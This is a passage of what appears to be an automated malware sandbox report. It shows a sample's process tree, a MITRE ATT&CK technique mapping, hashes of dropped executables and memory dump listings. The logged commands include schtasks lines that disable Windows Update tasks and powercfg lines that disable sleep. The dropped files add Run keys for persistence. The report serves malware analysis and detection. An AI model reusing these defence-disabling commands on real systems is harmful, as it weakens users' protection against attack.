4⤵
- Modifies registry key
PID:1528

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
4⤵
PID:3552

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
4⤵
PID:4808

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
4⤵
PID:3512

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
4⤵
PID:3212

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
4⤵
PID:4348

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
4⤵
PID:2668

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:3392

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of WriteProcessMemory
PID:1756

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4104

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4868

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2300

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4108

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\GMQ6XNBF\MyMXEmYnFoPFBPt.exe
"C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\GMQ6XNBF\MyMXEmYnFoPFBPt.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4384

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\S58XVZL8\YjXWQorEXSCmNzB.exe
"C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\S58XVZL8\YjXWQorEXSCmNzB.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:1788

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\G9LDH5FK\qRAPNmLiGFHwToK.exe
"C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\G9LDH5FK\qRAPNmLiGFHwToK.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4520

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

File Permissions Modification

T1222

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\ru1r3yf\imagestore.dat
Filesize
30KB

MD5
bba18cda92aad7cd04adc523a8766cb2

SHA1
f317294f0e2da6b0dfdf01a1ac5522176891230a

SHA256
8ec75c303fdeead50e168e3b22a289637d69c5484bebb3ac445013066fb641b0

SHA512
49057c41dbce0c496c419c2e034c85b5ef005a6135fe30f32683da01c02f09fb7c08f1ad6f9f3dd902d64f6d5076b16d0b19dd328ef025ad9a92942c891d3cd7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DU2BEY67\favicon[1].ico
Filesize
30KB

MD5
6eb4a43cb64c97f76562af703893c8fd

SHA1
c50c4273b9d2433c6069454f971ed6653e07c126

SHA256
1d7c95c5eea00a8083a95810f902682f9e26e7fbb7876b022a403642d776d0c9

SHA512
3bae9380d8f0d45617ecf9d0d43818b7f8f83b61ecbd5e6dbd189c19d5853f92aa47965ad257cf712e49c03652f129dca47e8a8dbd86d62e614acc99ea931181

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\G9LDH5FK\qRAPNmLiGFHwToK.exe
Filesize
107KB

MD5
29eddd1f0baf57ee4ff7e8ffb2c2ab13

SHA1
36852c695e14c98dc31d4d60e7d9d5e52b2a9fc8

SHA256
0d8a718208e701995fdb73e2506a5d2bffc135e69f3da4688e9f9e5a568be3f9

SHA512
ddc1a42dd2b33635cde178ba04023ab782d142dd17f4ef2498f996d50e1025d83b73146618c58ffce80c25c8c50d70696abc241a8468b7dd09d5fcb001ab38f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\G9LDH5FK\qRAPNmLiGFHwToK.exe.w936zuz.partial
Filesize
107KB

MD5
29eddd1f0baf57ee4ff7e8ffb2c2ab13

SHA1
36852c695e14c98dc31d4d60e7d9d5e52b2a9fc8

SHA256
0d8a718208e701995fdb73e2506a5d2bffc135e69f3da4688e9f9e5a568be3f9

SHA512
ddc1a42dd2b33635cde178ba04023ab782d142dd17f4ef2498f996d50e1025d83b73146618c58ffce80c25c8c50d70696abc241a8468b7dd09d5fcb001ab38f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\GMQ6XNBF\MyMXEmYnFoPFBPt.exe
Filesize
90KB

MD5
3cee2ab1eed5162e2dc415acfd0bca94

SHA1
f97ae2a4d7434206c2fa8aca099440f6c86a8a68

SHA256
89b564434cf70afd674eb0ce61c03991619e51ba44d69a0c6435de4464cad3fb

SHA512
26556c4584a9b95da8c48d3098293aa4b29d859094c7336285488ba3c5aa65e57f731d12683c93b38decada691447a1038def67ce7ba7a789935b4ab160c7605

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\GMQ6XNBF\MyMXEmYnFoPFBPt.exe.grwgate.partial
Filesize
90KB

MD5
3cee2ab1eed5162e2dc415acfd0bca94

SHA1
f97ae2a4d7434206c2fa8aca099440f6c86a8a68

SHA256
89b564434cf70afd674eb0ce61c03991619e51ba44d69a0c6435de4464cad3fb

SHA512
26556c4584a9b95da8c48d3098293aa4b29d859094c7336285488ba3c5aa65e57f731d12683c93b38decada691447a1038def67ce7ba7a789935b4ab160c7605

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\S58XVZL8\EdEYMrpFBNbTRHo.exe
Filesize
4.5MB

MD5
b7c12ce33a5c2de80bcd7083d839df6e

SHA1
6d2bce616fc00cafeb2ae4c5499305b36fcfb4f1

SHA256
65970760831f083ce65c5ec185f5c1d1c73217bcf600de567f2960b592412c52

SHA512
b3cbb1c781217aee343352f5ef2668fec9aa70a3f8ed39eafef88815bc4b5a858965d4ea9d30f86e04cdff4d22bef4447333027a56fbc02fc9708203e9987225

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\S58XVZL8\EdEYMrpFBNbTRHo.exe.k0hepnb.partial
Filesize
4.5MB

MD5
b7c12ce33a5c2de80bcd7083d839df6e

SHA1
6d2bce616fc00cafeb2ae4c5499305b36fcfb4f1

SHA256
65970760831f083ce65c5ec185f5c1d1c73217bcf600de567f2960b592412c52

SHA512
b3cbb1c781217aee343352f5ef2668fec9aa70a3f8ed39eafef88815bc4b5a858965d4ea9d30f86e04cdff4d22bef4447333027a56fbc02fc9708203e9987225

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\S58XVZL8\YjXWQorEXSCmNzB.exe
Filesize
202KB

MD5
f47f4f40886f05a734e2d6e584d6ab10

SHA1
b2f9e9feeb10c857094003049e32b0aeb2e0ef9d

SHA256
9b144809ef27214ff63ef708350546d6aa01929f4bb8cfb12f3efc462b0b0cd1

SHA512
26f073459367829272ab0356475b9191b5e247c3ad66cf5c52465389eca662823c830717341fabfce8f199f6d0185c5e7118e0597b7b01f4057dfe520ac9e7df

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\S58XVZL8\YjXWQorEXSCmNzB.exe.gopq8mc.partial
Filesize
202KB

MD5
f47f4f40886f05a734e2d6e584d6ab10

SHA1
b2f9e9feeb10c857094003049e32b0aeb2e0ef9d

SHA256
9b144809ef27214ff63ef708350546d6aa01929f4bb8cfb12f3efc462b0b0cd1

SHA512
26f073459367829272ab0356475b9191b5e247c3ad66cf5c52465389eca662823c830717341fabfce8f199f6d0185c5e7118e0597b7b01f4057dfe520ac9e7df

Download Submit
C:\Users\Admin\Downloads\EdEYMrpFBNbTRHo.exe.jj1oe1u.partial
Filesize
4.5MB

MD5
b7c12ce33a5c2de80bcd7083d839df6e

SHA1
6d2bce616fc00cafeb2ae4c5499305b36fcfb4f1

SHA256
65970760831f083ce65c5ec185f5c1d1c73217bcf600de567f2960b592412c52

SHA512
b3cbb1c781217aee343352f5ef2668fec9aa70a3f8ed39eafef88815bc4b5a858965d4ea9d30f86e04cdff4d22bef4447333027a56fbc02fc9708203e9987225

Download Submit
memory/8-167-0x0000000000000000-mapping.dmp

Download
memory/60-179-0x0000000000000000-mapping.dmp

Download
memory/948-178-0x0000000000000000-mapping.dmp

Download
memory/964-174-0x0000000000000000-mapping.dmp

Download
memory/1156-158-0x0000000000000000-mapping.dmp

Download
memory/1504-176-0x0000000000000000-mapping.dmp

Download
memory/1528-180-0x0000000000000000-mapping.dmp

Download
memory/1756-154-0x0000000000000000-mapping.dmp

Download
memory/1788-192-0x0000000000000000-mapping.dmp

Download
memory/1788-194-0x000000006F3C0000-0x000000006F971000-memory.dmp

Filesize
5.7MB

Download
memory/1788-199-0x000000006F3C0000-0x000000006F971000-memory.dmp

Filesize
5.7MB

Download
memory/2076-172-0x0000000000000000-mapping.dmp

Download
memory/2300-165-0x0000000000000000-mapping.dmp

Download
memory/2668-186-0x0000000000000000-mapping.dmp

Download
memory/2668-162-0x0000000000000000-mapping.dmp

Download
memory/3212-184-0x0000000000000000-mapping.dmp

Download
memory/3392-187-0x0000000000000000-mapping.dmp

Download
memory/3512-183-0x0000000000000000-mapping.dmp

Download
memory/3512-160-0x0000000000000000-mapping.dmp

Download
memory/3552-181-0x0000000000000000-mapping.dmp

Download
memory/3816-171-0x0000000000000000-mapping.dmp

Download
memory/3984-175-0x0000000000000000-mapping.dmp

Download
memory/4028-153-0x0000000000000000-mapping.dmp

Download
memory/4104-161-0x0000000000000000-mapping.dmp

Download
memory/4108-166-0x0000000000000000-mapping.dmp

Download
memory/4308-139-0x0000000000560000-0x00000000009E6000-memory.dmp

Filesize
4.5MB

Download
memory/4308-152-0x00007FF9620A0000-0x00007FF962B61000-memory.dmp

Filesize
10.8MB

Download
memory/4308-142-0x00007FF9620A0000-0x00007FF962B61000-memory.dmp

Filesize
10.8MB

Download
memory/4308-156-0x000000001C5B0000-0x000000001C5C2000-memory.dmp

Filesize
72KB

Download
memory/4308-136-0x0000000000000000-mapping.dmp

Download
memory/4348-185-0x0000000000000000-mapping.dmp

Download
memory/4384-188-0x0000000006760000-0x000000000677E000-memory.dmp

Filesize
120KB

Download
memory/4384-169-0x0000000007A60000-0x0000000007AD6000-memory.dmp

Filesize
472KB

Download
memory/4384-191-0x00000000081E0000-0x000000000870C000-memory.dmp

Filesize
5.2MB

Download
memory/4384-157-0x00000000061D0000-0x0000000006262000-memory.dmp

Filesize
584KB

Download
memory/4384-140-0x0000000000000000-mapping.dmp

Download
memory/4384-151-0x0000000005660000-0x000000000569C000-memory.dmp

Filesize
240KB

Download
memory/4384-150-0x0000000005730000-0x000000000583A000-memory.dmp

Filesize
1.0MB

Download
memory/4384-190-0x0000000007AE0000-0x0000000007CA2000-memory.dmp

Filesize
1.8MB

Download
memory/4384-159-0x0000000005B20000-0x0000000005B86000-memory.dmp

Filesize
408KB

Download
memory/4384-149-0x0000000005600000-0x0000000005612000-memory.dmp

Filesize
72KB

Download
memory/4384-144-0x0000000000C80000-0x0000000000C9C000-memory.dmp

Filesize
112KB

Download
memory/4384-168-0x0000000006710000-0x0000000006760000-memory.dmp

Filesize
320KB

Download
memory/4384-148-0x0000000005BB0000-0x00000000061C8000-memory.dmp

Filesize
6.1MB

Download
memory/4384-155-0x0000000006780000-0x0000000006D24000-memory.dmp

Filesize
5.6MB

Download
memory/4520-196-0x0000000000000000-mapping.dmp

Download
memory/4520-198-0x0000000000BD0000-0x0000000000BF0000-memory.dmp

Filesize
128KB

Download
memory/4636-146-0x000001EEB9500000-0x000001EEB9522000-memory.dmp

Filesize
136KB

Download
memory/4636-145-0x00007FF9620A0000-0x00007FF962B61000-memory.dmp

Filesize
10.8MB

Download
memory/4636-147-0x00007FF9620A0000-0x00007FF962B61000-memory.dmp

Filesize
10.8MB

Download
memory/4636-143-0x0000000000000000-mapping.dmp

Download
memory/4732-170-0x0000000000000000-mapping.dmp

Download
memory/4808-182-0x0000000000000000-mapping.dmp

Download
memory/4868-163-0x0000000000000000-mapping.dmp

Download
memory/4872-173-0x0000000000000000-mapping.dmp

Download
memory/4988-164-0x0000000000000000-mapping.dmp

Download
memory/5104-177-0x0000000000000000-mapping.dmp

Download